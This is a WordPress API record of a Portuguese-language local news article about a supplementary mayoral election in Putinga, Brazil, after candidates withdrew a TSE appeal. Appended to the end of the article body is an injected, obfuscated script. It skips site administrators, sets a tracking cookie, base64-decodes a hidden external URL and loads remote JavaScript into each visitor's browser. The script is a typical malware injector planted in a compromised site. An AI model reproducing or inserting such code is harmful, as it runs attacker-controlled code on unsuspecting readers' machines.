{"id":3442,"date":"2021-01-08T17:20:10","date_gmt":"2021-01-08T17:20:10","guid":{"rendered":"https:\/\/www.jornalnotiserra.com.br\/?p=3442"},"modified":"2026-04-04T18:17:39","modified_gmt":"2026-04-04T18:17:39","slug":"putinga-tera-nova-eleicao","status":"publish","type":"post","link":"https:\/\/www.jornalnotiserra.com.br\/index.php\/2021\/01\/08\/putinga-tera-nova-eleicao\/","title":{"rendered":"Putinga ter\u00e1 nova elei\u00e7\u00e3o"},"content":{"rendered":"<p>A data da Elei\u00e7\u00e3o Suplementar ainda n\u00e3o est\u00e1 definida<\/p>\n<p>O recurso dos candidatos ao cargo de prefeito e vice do munic\u00edpio de Putinga, Claudiomiro Angelo Cenci e Paulo S\u00e9rgio Lima dos Santos que estava no TSE, teve a desist\u00eancia do recurso por parte dos recorrentes. Com isso uma nova elei\u00e7\u00e3o ser\u00e1 realizada no munic\u00edpio.<\/p>\n<p>Os candidatos estavam com o registro da candidatura indeferido por algumas irregularidades na ata e mesmo tendo obtido a maioria dos votos nas elei\u00e7\u00f5es municipais de novembro, n\u00e3o foram considerados eleitos pela condi\u00e7\u00e3o em que se encontravam os candidatos.<\/p>\n<p>Com a realiza\u00e7\u00e3o de uma nova elei\u00e7\u00e3o e se Claudiomiro vier a concorrer novamente ao pleito, corre o risco novamente de ter sua candidatura indeferida, pois de acordo com um entendimento fixado pelo TSE, n\u00e3o poder\u00e1 participar de elei\u00e7\u00e3o suplementar o candidato que tenha dado causa \u00e0 anula\u00e7\u00e3o do pleito\u00a0original (ordin\u00e1rio). A orienta\u00e7\u00e3o da Corte vale para elei\u00e7\u00f5es futuras.<\/p>\n<p>As elei\u00e7\u00f5es suplementares ocorrem quando h\u00e1 a incid\u00eancia das situa\u00e7\u00f5es previstas no\u00a0par\u00e1grafo\u00a03\u00ba\u00a0do artigo 224\u00a0da\u00a0Lei n\u00ba 4.737\/1965 (C\u00f3digo Eleitoral). O dispositivo\u00a0estabelece que\u00a0decis\u00e3o da Justi\u00e7a Eleitoral que importe o indeferimento de\u00a0registro, cassa\u00e7\u00e3o do diploma ou perda do mandato de candidato eleito em pleito majorit\u00e1rio resultar\u00e1 na realiza\u00e7\u00e3o de novas elei\u00e7\u00f5es, independentemente do n\u00famero de votos anulados.<\/p>\n<p>O Tribunal tomou tal posicionamento ao julgar\u00a0recurso em que Dalton Vieira dos Santos (PP), eleito prefeito de Petrolina de Goi\u00e1s (GO) no pleito suplementar, solicitou o deferimento do seu pedido de registro\u00a0de candidatura, rejeitado\u00a0pelo Tribunal Regional Eleitoral de Goi\u00e1s (TRE-GO). A\u00a0corte regional alegou que Dalton n\u00e3o poderia participar do pleito suplementar por ter sido o respons\u00e1vel pela nulidade da elei\u00e7\u00e3o para a prefeitura em 2016.<\/p>\n<p>Embora tenha firmado\u00a0entendimento\u00a0sobre a impossibilidade de participa\u00e7\u00e3o, em elei\u00e7\u00f5es suplementares, de\u00a0candidato que deu causa \u00e0 anula\u00e7\u00e3o do pleito\u00a0original,\u00a0o Plen\u00e1rio do TSE deferiu, por maioria de votos, o registro de candidatura de Vieira ao pleito suplementar. A decis\u00e3o foi tomada com fundamento na\u00a0seguran\u00e7a jur\u00eddica,\u00a0para evitar maior instabilidade pol\u00edtica e social em Petrolina de Goi\u00e1s.<\/p>\n<p>S\u00e3o riscos que os candidatos poder\u00e3o correr, se resolverem novamente concorrer nas elei\u00e7\u00f5es suplementares no munic\u00edpio.<\/p>\n<p>De acordo com o Cart\u00f3rio Eleitoral de Arvorezinha, o qual \u00e9 o respons\u00e1vel pelas elei\u00e7\u00f5es em Putinga, n\u00e3o est\u00e1 definido ainda a data em que a Elei\u00e7\u00e3o Suplementar ser\u00e1 realizada no munic\u00edpio.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A data da Elei\u00e7\u00e3o Suplementar ainda n\u00e3o est\u00e1 definida O recurso dos candidatos ao cargo de prefeito e vice do munic\u00edpio de Putinga, Claudiomiro Angelo Cenci e Paulo S\u00e9rgio Lima dos Santos que estava no TSE, teve a desist\u00eancia do recurso por parte dos recorrentes. Com isso uma nova elei\u00e7\u00e3o ser\u00e1 realizada no munic\u00edpio. Os&#8230;<\/p>\n","protected":false},"author":7,"featured_media":3439,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[52],"tags":[],"_links":{"self":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3442"}],"collection":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/comments?post=3442"}],"version-history":[{"count":2,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3442\/revisions"}],"predecessor-version":[{"id":3444,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/posts\/3442\/revisions\/3444"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media\/3439"}],"wp:attachment":[{"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/media?parent=3442"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/categories?post=3442"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.jornalnotiserra.com.br\/index.php\/wp-json\/wp\/v2\/tags?post=3442"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}